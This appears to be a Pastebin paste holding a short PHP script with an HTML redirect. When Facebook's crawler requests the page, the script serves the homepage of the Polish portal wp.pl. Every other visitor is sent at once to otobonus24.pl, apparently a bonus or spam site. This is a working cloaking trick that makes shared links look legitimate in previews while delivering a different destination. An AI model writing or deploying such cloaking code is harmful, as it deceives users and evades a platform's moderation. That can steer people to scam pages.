Advertisement
Guest User

Untitled

a guest
Feb 8th, 2016
55
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. if(!empty($_SERVER['HTTP_USER_AGENT']))
  5. {
  6. $pos = strpos($_SERVER['HTTP_USER_AGENT'], "facebook");
  7. if($pos !== false)
  8. {
  9. $homepage = file_get_contents('http://www.wp.pl/');
  10. echo $homepage;
  11. exit();
  12. }
  13.  
  14. }
  15.  
  16.  
  17. ?>
  18.  
  19. <head>
  20.  
  21. <meta http-equiv="refresh" content="0; url=http://otobonus24.pl/" />
  22. </head>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement